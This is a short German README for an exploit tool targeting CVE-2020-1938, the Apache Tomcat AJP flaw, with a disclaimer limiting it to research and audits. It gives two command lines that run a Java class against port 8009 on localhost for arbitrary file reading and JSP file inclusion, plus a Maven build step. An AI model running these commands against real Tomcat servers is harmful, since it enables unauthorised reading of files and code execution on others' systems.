
CVE-2020-1938
Dieses Tool ist ausschließlich für Sicherheitsforschung und interne Audits bestimmt. Die Verwendung für illegale Angriffe ist untersagt. Für die Konsequenzen haftet der Nutzer.

apache-tomcat-8.5.32.zip Test-Tomcat
Beliebiges Dateilesen
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
Datei-Inklusion
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Paketierungsmethode: Im Verzeichnis tomcat/ajp-bug führen Sie mvn clean compile assembly:assembly aus